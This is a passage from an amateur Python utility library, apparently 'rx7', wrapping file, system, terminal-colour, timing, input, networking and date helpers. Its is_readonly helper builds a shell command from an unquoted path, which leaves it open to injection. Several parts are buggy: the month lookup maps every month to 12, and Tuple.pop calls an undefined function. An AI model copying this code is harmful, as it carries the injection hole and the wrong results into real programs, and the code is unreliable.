raise OSError(f"[WinError 145] The directory is not empty: '{path}'" + '\n' + ' '*23 +
'(Use force=True as an argument of remove function to remove non-empty directories.)') from None
delete = remove
@staticmethod
def rename(old_name,new_name):
'''Rename files with this function.'''
_os.rename(old_name,new_name)
@staticmethod
def abspath(path):
'''
return absolute path of given path.
'''
return _os.path.abspath(path)
@staticmethod
def exists(path):
'''
Search for the file And Returns a boolean.
if file exists: True
else: False
'''
return _os.path.exists(path)
@staticmethod
def mdftime(path):
'''
Get last modify time of the path.
'''
return _os.path.getmtime(path)
@staticmethod
def acstime(path):
'''
Get last access time of the path.
'''
return _os.path.getatime(path)
# change to date bayad biad
@staticmethod
def move(src,dst):
'''
Move (cut) file/directory from crs to dst.
'''
_shutil.move(src,dst)
#live_path= dst
#Baraye folder hast ya na?
@staticmethod
def copy(src,dest,preserve_metadata= True):
'''
Copy the file from src to destination.
preserve_metadata is for preserving metadata of file when copying.
(You can use it instead of rename too.
e.g:
copy('D:\\Test.py','E:\\Ali.py')
(It copies Test.py to E drive and renames it to Ali.py)
)
'''
if files.isdir(src):
_shutil.copytree(src,dest)
else:
if preserve_metadata: _shutil.copy2(src,dest)
else: _shutil.copy(src,dest)
@staticmethod
def hide(path,mode=True):
'''
Hide file or folder.
If mode==False: makes 'not hide'
(ONLY WINDOWS)
'''
try:
import win32api, win32con
except:
raise ImportError('Please install pywin32 via pip')
if mode:
win32api.SetFileAttributes(path,win32con.FILE_ATTRIBUTE_HIDDEN)
else:
win32api.SetFileAttributes(path,win32con.FILE_ATTRIBUTE_NORMAL)
@staticmethod
def read_only(path,mode=True):
'''
Make file attribute read_only.
If mode==False: makes 'not read_only'
'''
if type(mode)==bool:
from stat import S_IREAD,S_IWUSR
if mode==True:
_os.chmod(path, S_IREAD)
elif mode==False:
_os.chmod(path, S_IWUSR)
else:
raise Exception('Second argumant (mode) should be boolean.')
@staticmethod
def read(path):
'''
This can help you to read your file faster.
Example:
read('C:\\users\\Jack\\test.txt')
==> "Content of 'test.txt' will be shown."
'''
with open(path) as f:
FileR= f.read()
return FileR
@staticmethod
def write(file_path,text=None,mode='replace',start=''):
'''
With this method you can change content of the file.
file: File you want to change its content.
content: Content you want to add to file.
mode: Type of writing method.
'a' or 'continue' for add content to end of the file.
'w' or 'replace' for overwriting to file content.
start: I use this when I use mode='continue'
'''
if mode=='replace':
op= open(file_path,mode='w')
if text==None:
text= input('Type what you want.\n\n')
op.write(text)
op.close()
elif mode=='continue':
'''opr= open(file,mode='r')
FileR= opr.read()
op= open(file,mode='w')'''
op=open(file_path,'a')
if text==None:
text= input('Type what you want to add in the end of the file.\n\n')
op.write(start+text)
op.close()
else:
raise ValueError('mode can only be: replace(default) or continue Not "{0}"'.format(mode))
@staticmethod
def isdir(path):
return _os.path.isdir(path)
@staticmethod
def isfile(path):
return _os.path.isfile(path)
@staticmethod
def is_readonly(path):
'''
Return True if path is readonly else False.
(May Not Work in Linux)
'''
return _subprocess.getoutput(f'dir /ar {path} >nul 2>nul && echo True || echo False')
@staticmethod
def is_hidden(path):
"""
Check whether a file is presumed hidden, either because
the pathname starts with dot or because the platform
indicates such.
Return True if File or Directory is hidden.
(Work on both Linux and Windows)
"""
import platform
full_path = _os.path.abspath(path)
name = _os.path.basename(full_path)
def no(path): return False
platform_hidden = globals().get('is_hidden_' + platform.system(), no)
return name.startswith('.') or platform_hidden(full_path)
@staticmethod
def is_hidden_Windows(path):
import ctypes
res = ctypes.windll.kernel32.GetFileAttributesW(path)
assert res != -1
return bool(res & 2)
@staticmethod
def search_file(pattern, path='.\\',return_mode: Union['list','Generator']= 'list'):
'''
Search for files in path.
Return list or generator.
pattern:
- 'x.py' : search for 'x.py' in path.
- '*.py' : search for all files with .py extension in path.
- '*.*' : search for all files in path
- '**/*' : search for any file in path and also all sub-directories.
- '**/*.py: search for all python files in path and also sub-directories.
- 'mydir/**/*.py' : search for all python files in path/mydir/ and all of its sub-directories.
'''
import glob
if str(return_mode).lower() in ('list','generator'):
#print(_os.path.join(path,pattern))
if return_mode=='list': return glob.glob(_os.path.join(path,pattern), recursive=True)
else: return glob.iglob(_os.path.join(path,pattern), recursive=True)
else:
if type(return_mode)==str:
raise ValueError(f"return_mode van be 'list' or 'generator' not {return_mode}")
else:
raise TypeError(f"return_mode type should be 'str' and it should be in ['list', 'generator']")
@staticmethod
def search_content(path,word):
ALL= [val for sublist in [[_os.path.join(i[0], j) for j in i[2]] for i in _os.walk(path)] for val in sublist]
'''lst=[]
for file in ALL:
if word in rx.read(file):
lst.append(file)
return lst'''
return [file for file in ALL if word in open(file).read()]
@staticmethod
def mkdir(path):
path = _os.path.normpath(path)
NEW= ''
for FILE in path.split('\\'):
NEW+= FILE+'\\'
try: _os.mkdir(NEW)
except (FileExistsError,FileNotFoundError): pass
@staticmethod
def generate_tree(dir_path, level: int=-1, limit_to_directories: bool=False,
length_limit: int=1000, print_info: bool=True):
"""Given a directory Path object return a visual tree structure"""
from pathlib import Path
from itertools import islice
space= ' '; branch = '│ '; tee= '├── '; last= '└── '
dir_path = Path(dir_path) # accept string coerceable to Path
files = 0
directories = 0
def inner(dir_path: Path, prefix: str='', level=-1):
nonlocal files, directories
if not level: return # 0, stop iterating
if limit_to_directories: contents = [d for d in dir_path.iterdir() if d.is_dir()]
else: contents = list(dir_path.iterdir())
pointers = [tee] * (len(contents) - 1) + [last]
for pointer, path in zip(pointers, contents):
if path.is_dir():
yield prefix + pointer + path.name
directories += 1
extension = branch if pointer == tee else space
yield from inner(path, prefix=prefix+extension, level=level-1)
elif not limit_to_directories:
yield prefix + pointer + path.name
files += 1
RETURN=''
RETURN+=dir_path.name+'\n'
iterator = inner(dir_path, level=level)
for line in islice(iterator, length_limit): RETURN+=line+'\n'
if next(iterator, None): RETURN+=f'... length_limit, {length_limit}, reached, counted:'
if print_info: RETURN+=f'\n{directories} directories' + (f', {files} files' if files else '')
return RETURN
class MEMBERS:
@staticmethod
def all_exactdir(dir):
return _os.listdir(dir)
@staticmethod
def all_all_sep(dir):
return [i for i in _os.walk(dir)]
@staticmethod
def files_exactdir(dir,abspath=True):
if abspath:
return [dir+'/'+file_ for file_ in [i for i in _os.walk(dir)][0][2]]
return [i for i in _os.walk(dir)][0][2]
@staticmethod
def files_all(dir):
return [val for sublist in [[_os.path.join(i[0], j) for j in i[2]] for i in _os.walk(dir)] for val in sublist]
@staticmethod
def files_all_sep(dir):
return [[_os.path.join(i[0], j) for j in i[2]] for i in _os.walk(dir)]
@staticmethod
def dirs_exactdir(dir, abspath=True):
if dir.endswith('/'): dir=dir[:-1]
elif dir.endswith('\\'): dir=dir[:-1]
if abspath:
return [dir+'/'+folder for folder in [i for i in _os.walk(dir)][0][1]]
return [i for i in _os.walk(dir)][0][1]
@staticmethod
def dirs_all(dir):
return [TPL[0] for TPL in [i for i in _os.walk(dir)]]
files = Files
write = files.write
read = files.read
class System:
'''
Some system actions and information.
- Information about ram, ip, terminal, etc.
- Some System Actions like Shutdown and Restart
(ALL FUNCTIONS ARE STATIC METHODS)
'''
@staticmethod
def accname():
'''
return account username you have logged in.
'''
return _os.getlogin()
@staticmethod
def pid():
'''
Get pid number of terminal and return it.
'''
return _os.getpid()
'''@staticmethod
def disk_usage(path):
####
return _shutil.disk_usage(path)'''
@staticmethod
def chdir(path):
'''
Change directory of terminal.
'''
_os.chdir(path)
@staticmethod
def SHUT_DOWN():
'''
Shut down the PC. (WINDOWS)
'''
_os.system("shutdown /s /t 1")
@staticmethod
def RESTART():
'''
Restart the PC. (WINDOWS)
'''
_os.system("shutdown /r /t 1")
@staticmethod
def terminal_size() -> tuple:
'''
Return terminal size in tuple (columns,rows)
'''
size= _os.get_terminal_size()
return (size.columns,size.lines)
@staticmethod
def cwd():
'''
Return a unicode string representing the current working directory.
'''
return _os.getcwd()
@staticmethod
def ip_global():
"""
Return ip with by http://ipinfo.io/ip api.
returns global ip as string
"""
try:
import requests
new_session = _requests.session()
response = new_session.get("http://ipinfo.io/ip")
import re
ip_list = _re.findall(r"(?:[0-9]{1,3}\.){3}[0-9]{1,3}", response.text)
new_session.close()
return ip_list[0]
except:
raise ConnectionError('No Internet Connection') from None
"""ip_global= internet.ip_global"""
@staticmethod
def ip_local():
"""
Return local ip of computer in windows by _socket. module
and in unix with hostname command in shell.
"""
#return [l for l in ([ip for ip in _socket.gethostbyname_ex(_socket.gethostname())[2] if not ip.startswith("127.")][:1], [[(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [_socket._socket.(_socket.AF_INET, _socket.SOCK_DGRAM)]][0][1]]) if l][0][0]
'''
s = _socket._socket.(_socket.AF_INET, _socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except Exception:
IP = '127.0.0.1'
finally:
s.close()
return IP
'''
import platform
class NetworkError(Exception):
def __init__(self, message): super().__init__(message)
try:
ip = _socket.gethostbyname(_socket.gethostname())
if ip and ip != "127.0.1.1":
return ip
elif platform.system() != "Windows":
import subprocess
command = _subprocess.Popen(["hostname", "-I"],stdout=_subprocess.PIPE,stderr=_subprocess.PIPE,stdin=_subprocess.PIPE,shell=False)
response = list(command.communicate())
if len(response[0]) > 0:
return str(response[0])[2:-4]
raise NetworkError('No Network Connection')
raise NetworkError('No Network Connection')
except:
raise
"""ip_local= internet.ip_local"""
@staticmethod
def ram_total(convert=True):
"""
Return total ram of board as string
parameter convert: flag for convert mode (using of convert_byte function)
"""
response = list(_psutil.virtual_memory())
if convert:
return convert_bytes(int(response[0]))
return str(response[0])
@staticmethod
def ram_used(convert=True):
"""
Return how much ram is using.
parameter convert: flag for convert mode (convert with convert_byte function)
"""
response = list(_psutil.virtual_memory())
if convert:
return convert_bytes(int(response[3]))
return str(response[3])
@staticmethod
def ram_free(convert=True):
"""
Return how much ram is available.
parameter convert: flag for convert mode (convert with convert_byte function)
"""
response = list(_psutil.virtual_memory())
if convert:
return convert_bytes(int(response[1]))
return str(response[1])
@staticmethod
def ram_percent(ONLY_NOM=False):
"""
Return available ram percentage as an integer if ONLY_NOM, as string with % if not ONLY_NOM
Parameter ONLY_NOM: flag for return type and value.
"""
response = list(_psutil.virtual_memory())
if ONLY_NOM:
return response[2]
return str(response[2]) + " %"
@staticmethod
def boot_time():
'''
Return the system boot time expressed in seconds since the epoch.
'''
return _psutil.boot_time()
@staticmethod
def device_name():
return _socket.gethostname()
@staticmethod
def ip_website(url):
'''get IP address of Web Site'''
return _socket.gethostbyname(url)
"""ip_webs= internet.ip_website"""
@staticmethod
def win10_notification(title,message,icon=None, duration=5) -> None:
'''
(THIS ONLY WORKS FOR "WINDOWS 10")\n
Display Notification with title, message and icon for speciefic _time.
'''
try:
from win10toast import ToastNotifier
ToastNotifier().show_toast(title,message,duration=duration)
except:
raise ImportError('Use "pip install win10toast" to install required module')
@staticmethod
def cpu_count(logical=True):
'''
Return the number of logical CPUs in the system
(same as _os.cpu_count() in Python 3.4).
If *logical* is False return the number of physical cores only
(e.g. hyper thread CPUs are excluded).
Return None if undetermined.
'''
return _psutil.cpu_count(logical)
@staticmethod
def pyshell_execute_bit():
'''to determine whether a Python shell is executing in 32bit or 64bit'''
#return platform.architecture()[0][:2] # SLOW
#return ctypes.sizeof(ctypes.c_voidp)*8
import struct
return struct.calcsize("P") * 8
@staticmethod
def pids() -> list:
'''Return a list of current running PIDs'''
return _psutil.pids()
@staticmethod
def cpu_percent() -> float:
'''
Return a float representing the current system-wide CPU utilization as a percentage.'''
return _psutil.cpu_percent()
@staticmethod
def pid_exists(pid) -> bool:
return _psutil.pid_exists(pid)
@staticmethod
def mac_address(formatted=False):
import uuid
mac = uuid.getnode()
if formatted:
return ':'.join(['{:02x}'.format((mac >> ele) & 0xff) for ele in range(0,8*6,8)][::-1])
return hex(mac)
system = System
from colored import fg as _fg
from colored import bg as _bg
from colored import attr as _attr
class Style:
'''
This class is for Changing text Color,BG & Style.
(Using colored module but easier)
- style.print to customize your print.
- style.switch to change terminal colors.
- style.switch_default for making everything default.
Also You Can Create style object.
This will allow you to:
- Because it returns string You can Add it to other strings
- Slicing and indexing (Without Color)
'''
def __init__(self, text, color='default', BG='black'):
try:
self.color = color.lower()
self.BG = BG.lower()
#style = style.lower()
except:
pass
if color == 'default':
self.color = 7 #188
self.text = text
self.content = f"{_fg(color)}{_bg(BG)}{text}{_attr(0)}"
def __str__(self):
return self.content
def __repr__(self):
return self.content
def __add__(self, other):
#print(type(other))
if type(other)!=style:
return self.content+other
else:
return self.content+other.content
@staticmethod
def print(text='', color='default', BG='default', style=None, end='\n'):
'''
text(text='Hello World',color='red',BG='white')
output ==> 'Hello World' (With red color and white BG)
Styles: bold - underline - reverse - hidden
*bold and underline may not work. (Depends on terminal and OS)
'''
try:
color = color.lower()
BG = BG.lower()
style = style.lower() if style and type(style)==str else 0
except:
raise
if style == 'none':
style = 0
if color=='default' and BG!='default': # _bg & !clr
print(f'{_attr(style)}{_bg(BG)}{text}{_attr(0)}', end=end)
elif color!='default' and BG=='default': # !_bg & clr
print(f'{_attr(style)}{_fg(color)}{text}{_attr(0)}', end=end)
elif color=='default' and BG=='default': # !_bg & !clr
print(f'{_attr(style)}{text}{_attr(0)}', end=end)
elif color!='default' and BG!='default': # _bg & clr
print(f'{_attr(style)}{_bg(BG)}{_fg(color)}{text}{_attr(0)}', end=end)
@staticmethod
def switch(color='default', BG='black', style='None'):
'''
Change color,BG and style untill you call it again and change them.
'''
try:
color = color.lower()
BG = BG.lower()
style = style.lower()
except:
pass
if style == 'none':
style = 0
if color == 'default':
color = 7
print(f'{_attr(style)}{_bg(BG)}{_fg(color)}', end='')
@staticmethod
def switch_default():
'''Switch Terminal Attributes to its defaults'''
print(f'{_attr(0)}', end='')
reset = switch_default
@staticmethod
def log_success(text, color='green', BG='default', style=None, add_time=True):
#globals()['style'].print(text, color, BG, style=style)
NOW = _time.strftime('%H:%M:%S',_time.localtime()) if add_time else ''
globals()['style'].print(NOW, color, BG,end=' ')
globals()['style'].print(text, color, BG, style=style)
@staticmethod
def log_info(text, color='grey_93', BG='default', style=None, add_time=True):
NOW = _time.strftime('%H:%M:%S',_time.localtime()) if add_time else ''
globals()['style'].print(NOW, color, BG,end=' ')
globals()['style'].print(text, color, BG, style=style)
@staticmethod
def log_warning(text, color='gold_3a', BG='default', style=None, add_time=True):
NOW = _time.strftime('%H:%M:%S',_time.localtime()) if add_time else ''
globals()['style'].print(NOW, color, BG,end=' ')
globals()['style'].print(text, color, BG, style=style)
@staticmethod
def log_error(text, color='red', BG='default', style=None, add_time=True):
NOW = _time.strftime('%H:%M:%S',_time.localtime()) if add_time else ''
globals()['style'].print(NOW, color, BG,end=' ')
globals()['style'].print(text, color, BG, style=style)
@staticmethod
def log_critical(text, color='red_1', BG='default', style='bold', add_time=True):
NOW = _time.strftime('%H:%M:%S',_time.localtime()) if add_time else ''
globals()['style'].print(NOW, color, BG,end=' ')
globals()['style'].print(text, color, BG, style=style)
style = Style
class Record:
'''
Use this method to record an action time in second.
Usage:
Start= record()
#Some codes here...
Finnish= Start.lap()
print(Finnish) ==> 0.25486741
#Some more codes here...
Finnish= Start.lap() ==> 0.4502586
Start.laps --> [0.25486741, 0.4502586]
Use Start.stop() to finnish recording and save memory.
(after self.stop() using self.lap will cause error.)
'''
def __init__(self):
self.__start = _time.time()
self.laps = []
def __call__(self):
return f'Laps: {self.laps}'
def __repr__(self):
return f'Laps: {self.laps}'
def lap(self, save=True, Round=15):
'''
Return time passed from creating time of self.
(Read 'record' Doc String)
If save is True, time will be added to self.laps
'''
lp = _time.time() - self.__start
lp = round(lp,Round)
if save:
self.laps.append(lp)
return lp
def reset(self, reset_start=False):
'''
This will erase self.laps
If reset_start is True, start time will reset too.
'''
self.laps = []
if reset_start:
self.__start = _time.time()
def last_lap(self, save=True):
'''
Return time passed from last lap
(If self.laps is False then from start_time)
'''
ret = (self.lap(False)-self.laps[-1]) if self.laps else self.lap(False)
if save:
self.laps.append(self.lap())
return ret
@staticmethod
def timit(code,setup,times,globals_):
'''
Run the 'code' for 'times' times and return time it needs (all, not once)
(If you need any initialization for your 'code', put it in setup arg)
'''
import timeit
return timeit.timeit(stmt=code,setup=setup,number=times,globals=globals_)
record = Record
class Terminal:
"""
Run Terminal Commands with Terminal functions
(ALL FUNCTIONS ARE STATIC METHODS)
"""
@staticmethod
def run(command:str) -> None:
'''
Execute the command in a subshell
(NO RETURN, LIVE EXECUTION, OUTPUT WILL BE PRINTED)
'''
_os.system(command)
@staticmethod
def getoutput(command:str) -> str:
'''
Return output of executing command in a shell
(RETURN STR, RETURN AFTER EXECUTING CODE)
'''
return _subprocess.getoutput(command)
terminal = Terminal
class Decorator:
class Check_Type:
"""
Function decorator for developers\n
Use this decorator to check if user gives right argument type\n
You need to annotate argument type when defining it.\n
Supported Types:
* str
* list
* set
* dict
* tuple
* User-Defined Objects
Typing Module Supported Types:
* Iterable
* Callable
* Generatr
* Container
* Any
(MORE TYPES SOON ...)
'''
sig = signature(foo)
print(str(sig))
print(str(sig.parameters['b']))
print(sig.parameters['b'].annotation)
####
sig = signature(foo)
for param in sig.parameters.values():
if (param.kind == param.KEYWORD_ONLY and
param.default is param.empty):
print('Parameter:', param.annotation)
'''
"""
auto_correct = False
def __init__(self, function):
self.function = function
def __call__(self, *args, **kwargs):
special_types = ('callable', 'iterable', 'generator','container', 'any')
i=-1
__local__= list(locals()['args'])
annots= list(self.function.__annotations__.keys())
def extra_remover(correct):
# Typing module annots check
if correct.startswith('typing.'):
correct = correct[7:].lower()
# built-in types check
elif correct.startswith('<class '):
correct = correct[8:-2]
return correct
def check_specials(TYPE, LOCAL_I):
import inspect
wrong = ''
if TYPE == 'generator':
if inspect.isgeneratorfunction(LOCAL_I) or inspect.isgenerator(LOCAL_I):
return
else:
correct = 'generator'
elif TYPE == 'callable':
if callable(LOCAL_I):
return
else:
correct = 'callable'
elif TYPE == 'iterable':
if type(LOCAL_I) in (list, tuple, set, str):
print(type(LOCAL_I))
return
else:
correct = 'iterable'
elif TYPE == 'container':
if type(LOCAL_I) in (list,set,dict,tuple):
return
else:
correct = 'container'
elif TYPE == 'any':
return
wrong = extra_remover(str(type(LOCAL_I))) if not wrong else wrong
func_name = self.function.__name__
Error= TypeError(f"'{func_name}()' argument '{ARG}' must be '{correct}' (not '{wrong}')")
raise Error
for ARG in annots:
i += 1
try:
LOCAL_I = __local__[i]
correct = str(self.function.__annotations__[ARG])
'''if correct.startswith('typing.Union'):
correct = eval(correct[12:])
if type(correct) != list:
correct = [correct]'''
correct = extra_remover(correct)
if correct in special_types:
print(type(LOCAL_I))
check_specials(correct,LOCAL_I)
# Builtins and other Libraries objects
elif not eval(correct) == type(LOCAL_I):
if Check_Type.auto_correct:
try:
__local__[i] = eval(correct)(LOCAL_I)
continue
except ValueError:
pass
wrong = extra_remover(str(type(LOCAL_I)))
#correct = str(self.function.__annotations__[ARG])#[8:-2]
correct = extra_remover(correct)
func_name = self.function.__name__
Error= TypeError(f"'{func_name}()' argument '{ARG}' must be '{correct}' (not '{wrong}')")
raise Error
except (ValueError,IndexError):
pass#raise
except NameError:
raise
return self.function(*__local__, **kwargs)
decorator_all:Callable = None
@staticmethod
def attach_to_all(cls):
import inspect
for name, method in inspect.getmembers(cls):
if (not inspect.ismethod(method) and
not inspect.isfunction(method) ) or (
inspect.isbuiltin(method)):
continue
#print("Decorating function %s" % name)
setattr(cls, name, Decorator.decorator_all(method))
return cls
abstractmethod = _abc.abstractmethod
_registered_functions = {} #:Dict[str, Any]
class _MultiMethod(object):
def __init__(self, name):
self.name = name
self.typemap = {}
def __call__(self, *args):
types = tuple(arg.__class__ for arg in args)
function = self.typemap.get(types)
if function is None:
raise TypeError("no match: ",types)
return function(*args)
def register(self, types, function):
self.typemap[types] = function
def overload(*types):
def register(function):
name = function.__name__
mm = decorator._registered_functions.get(name)
if mm is None:
mm = decorator._registered_functions[name] = Decorator._MultiMethod(name)
mm.register(types, function)
return mm
return register
decorator = Decorator
Check_Type = Decorator.Check_Type
overload = Decorator.overload
class IO:
@staticmethod
def wait_for_input(prompt,SS:list=[]):
answer= ''
try:
while not answer:
answer = input(prompt).strip()
except (EOFError,KeyboardInterrupt):
style.print('EXITING...','red')
exit()
return answer
@staticmethod
def selective_input(prompt,choices,default=None,ignore_case=False,error=True,invalid='Invalid input'):
if type(choices) == dict:
Choices = list(choices.keys())+list(choices.values())
pass
if ignore_case:
Choices = [item.lower() for item in Choices]
while True:
inp = input(prompt)
inp = inp.lower() if ignore_case else inp
if not inp or inp not in Choices:
if error:
style.print(invalid, 'red')
else:
if default:
inp = default
break
else:
break
if type(choices) == dict:
try:
inp = choices[inp]
except KeyError:
pass
return inp
@staticmethod
def yesno_input(prompt,default=None):
error= not bool(default)
return io.selective_input(prompt,['y','yes','n','no'],default,error)
@staticmethod
def Input(prompt:str ='', default_value:str =''):
'''
Make Default Value For Your Input!
(THIS ONLY WORK ON WINDOWS (SORRY))
prompt is what you want and it's input(prompt) .
default_value is what there should be after prompt.
E.g:
>>> Input('Is rx7 Library Easy to Learn? ', 'Yes')
Is rx7 Library Easy to Learn? Yes
'''
import win32console
_stdin = win32console.GetStdHandle(win32console.STD_INPUT_HANDLE)
keys = []
for c in str(default_value):
evt = win32console.PyINPUT_RECORDType(win32console.KEY_EVENT)
evt.Char = c
evt.RepeatCount = 1
evt.KeyDown = True
keys.append(evt)
_stdin.WriteConsoleInput(keys)
return input(str(prompt))
@staticmethod
def getpass(prompt):
'''
Prompt for a password, with echo turned off.
'''
import getpass as Getpass
return Getpass.getpass(prompt=prompt)
io = IO
Input = default_input = io.Input
getpass = password_input = io.getpass
class Tuple:
'''
(Note That This is tuple of RX7 Module So it Has More Features!)\n
(This is Not Built-in immutable sequence.)\n
If no argument is given, the constructor returns an empty tuple.\n
There is *var argumant that you can add object as much as you need.\n
Any Built-in object is accepted. (Not tested on third-party objects.)\n
Beside built-in features of tuple, this supports:
+ You Can Add objects to your tuple now.
+ Also You Can Delete Them.
+ Replace Them.
+ Like lists, Tuple supports item assigning. ( tpl[2]='hello' )
(Tuple Unpacking is Supported.)
'''
#############################
def __init__(self,*var: Any, one_item=False):
if not one_item:
self.__content= tuple(var)
else:
self.__content=[]
for item in var:
for member in item:
self.__content.append(member)
self.__content= tuple(self.__content)
def __str__(self):
return str(self.__content)
def __repr__(self):
return str(self.__content)
#############################
#############################
def add(self,*var: Any):
'''
This will add var(s) to self.
'''
self.__content= tuple(list(self.__content)+[v for v in var])
#force= lambda tpl,*var: tuple(list(tpl)+[v for v in var])
force= add
def remove(self,*var: Any):
'''
It will remove var(s) from self.
'''
#lstv= [v for v in var if v in tpl]
lstt= list(self.__content)
for th in [v for v in var if v in self.__content]:
lstt.remove(th)
self.__content= tuple(lstt)
erase= remove
def pop(self,index):
return pop(self.__content)
#############################
#############################
def replace(self, ind: Union[int,Any], var: Any):
'''
Replace self[ind] with var.
'''
tpl=list(self.__content)
if type(ind) == str:
ind= tpl.index(ind)
tpl[ind]=var
self.__content= tuple(tpl)
def __setitem__(self,index,value,replace=False):
if not replace:
tpl=list(self.__content)
if type(index) == str:
ind= tpl.index(index)
tpl.insert(index,value)
self.__content= tuple(tpl)
else:
self.replace(index,value)
def __getitem__(self,index):
return self.__content[index]
#############################
def __add__(self,other):
return self.__content + other
def __contains__(self,var):
return var in self.__content
#############################
#############################
def __bool__(self):
return bool(len(self.__content))
def __hash__(self):
return hash(self.__content)
def __len__(self):
return len(self.__content)
#############################
#############################
_ReqConErr = _requests.exceptions.ConnectionError
class Internet:
@staticmethod
def is_connected(website='http://x.com/'):
'''
Check for internet connection with trying to connect to web-site
( Maybe you want to know why i used http://x.com/ as default web-site
The reason is there's no extra code to load
(compare x.com and google.com html source code)
And this make it a lot faster for checking.
)
'''
try:
_urllib.request.urlopen(website)
return True
except:
return False
def connection_checker(func):
"""Decaorator Which Checks Internet Connection before calling a function
Parameters
----------
func : Function
function which you are going to check if
there is internet connection before call it
"""
def inside(*args,**kwargs):
if not internet.is_connected():
raise ConnectionError('No internet connection') from None
return func(*args,**kwargs)
return inside
@staticmethod
def ip_global() -> str:
"""
Return your global ip by http://ipinfo.io/ip api.
"""
new_session = _requests.session()
response = new_session.get("http://ipinfo.io/ip")
ip_list = _re.findall(r"(?:[0-9]{1,3}\.){3}[0-9]{1,3}", response.text)
new_session.close()
return ip_list[0]
@staticmethod
def ip_local() -> str:
"""
Return local ip of computer in windows by _socket. module
and in linux with hostname command in shell.
"""
#return [l for l in ([ip for ip in _socket.gethostbyname_ex(_socket.gethostname())[2] if not ip.startswith("127.")][:1], [[(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [_socket._socket.(_socket.AF_INET, _socket.SOCK_DGRAM)]][0][1]]) if l][0][0]
'''
s = _socket._socket.(_socket.AF_INET, _socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except Exception:
IP = '127.0.0.1'
finally:
s.close()
return IP
'''
import platform
class NetworkError(Exception):
def __init__(self, message): super().__init__(message)
try:
ip = _socket.gethostbyname(_socket.gethostname())
if ip and ip not in ("127.0.1.1","127.0.0.1"):
return ip
elif platform.system() != "Windows":
command = _subprocess.Popen(["hostname", "-I"],stdout=_subprocess.PIPE,stderr=_subprocess.PIPE,stdin=_subprocess.PIPE,shell=False)
response = list(command.communicate())
if len(response[0]) > 0:
return str(response[0])[2:-4]
raise NetworkError('No Network Connection')
raise NetworkError('No Network Connection')
except:
raise
@staticmethod
def url_exists(URL) -> bool:
'''
check if url exists (with 'requests' module)
(NEED HTTP[S])
'''
try:
request = _requests.get(URL)
except _ReqConErr:
raise ConnectionError('No internet connection') from None
#print(response.status_code < 400)
if request.status_code == 200:
return True
else:
return False
@staticmethod
def ip_website(URL) -> str:
'''
get IP address of Web Site\n
(Without http[s])
'''
try:
return _socket.gethostbyname(URL)
except _socket.gaierror:
if internet.is_connected():
class NotExistsError(Exception):
def __init__(self):
super().__init__('URL Does Not Exists')
raise NotExistsError from None
else:
raise ConnectionError from None
@staticmethod
def url_links(URL) -> list:
'''
Get all links that are used in a specifiec url
(All "a" tags from html source)
(Needs 'http[s]')
''' #html.parser
try:
soup= BeautifulSoup(_requests.get(URL).text,features="lxml")
LINKS= []
for link in soup.find_all('a'):
LINKS.append(link.get('href'))
return LINKS
except _ReqConErr:
raise ConnectionError('No internet connection') from None
@staticmethod
def find_urls(string) -> list:
'''
find all urls in a string and returns list of them
(urls should start with http[s])
'''
url = _re.findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', string)
return url
@staticmethod
def is_url(URL) -> bool:
'''
check if a string is url (WITH HTTP[S])
'''
search= _re.search('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', URL)
'(http[s]?://)?([Ww]{3}\.)?(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
if search and len(search.group())==len(URL):
return True
else:
return False
@staticmethod
def open_browser(url,new_tab=True):
import webbrowser
if new_tab:
webbrowser.open_new_tab(url)
else:
webbrowser.open(url)
"""
@staticmethod
def whois(URL):
'''
return whois lookup of a website
(WITHOUT HTTPS)
'''
try:
import whois
WHO = whois.query(URL)
WHOIS = WHO.dict
return {i:WHOIS[i] for i in WHOIS}
except _socket.gaierror:
raise ConnectionError('No internet connection') from None
"""
internet = Internet
class DateTime:
_NOW= 0
_NOW_YEAR= 0
_NOW_MONTH= 0
_NOW_DAY= 0
_NOW_HOUR= -1
_NOW_MINUTE= -1
_NOW_SECOND= -1
def NOW():
_NOW= _time.localtime()
_NOW_YEAR= _NOW.tm_year
_NOW_MONTH= _NOW.tm_mon
_NOW_DAY= _NOW.tm_mday
_NOW_HOUR= _NOW.tm_hour
_NOW_MINUTE= _NOW.tm_min
_NOW_SECOND= _NOW.tm_sec
return _datetime.datetime(_NOW_YEAR,_NOW_MONTH,_NOW_DAY,_NOW_HOUR,_NOW_MINUTE,_NOW_SECOND)
now = NOW
def normalize(date=[],time=[]):
now = date_time.NOW()
try:
if not date[0]: date[0]= now.year
if type(date[1]) == str:
try:
date[1]= date_time.month_dic[date[1].lower()]
except KeyError:
raise ValueError("Wrong Month Name") from None
if not date[1]: date[1]= now.month
if not date[2]: date[2]= now.day
except IndexError:
pass
try:
if time[0]<0: now.hour
if time[1]<0: now.minute
if time[2]<0: now.second
except IndexError:
pass
return [date,time]
Weekday_Names= ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']
month_lst= ['january','february','march','april','may','june',
'july','august','september','october','november','december']
month_dic= {month:month_nom for month in month_lst for month_nom in range(1,13)}
def __init__(self,year=_NOW_YEAR,month=_NOW_MONTH,day=_NOW_DAY,hour=_NOW_HOUR,minute=_NOW_MINUTE,second=_NOW_SECOND,first_week_day=0):
'''
.: Working With Date and Time :.
- Include Both Static Methods and Class Methods
- Get NOW Time
- Show in Calendar
- Next and Previous Months in Calendar
- Determine Time Passed From Specific Date
- Calendar Supports Setting First Day of the Week
'''
"""
Now = date_time.NOW()
if not year : year=Now.year
if not month: month=Now.month
if not day : day=Now.day
if hour<0 : hour=Now.hour
if minute<0 : minute=Now.minute
if second<0 : second=Now.second
"""
_norm = date_time.normalize([year,month,day],[hour,minute,second])
year,month,day = _norm[0]
hour,minute,second = _norm[1]
if type(month)==str:
try:
month= date_time.month_dic[month.lower()]
except KeyError:
raise ValueError("Wrong Month Name") from None
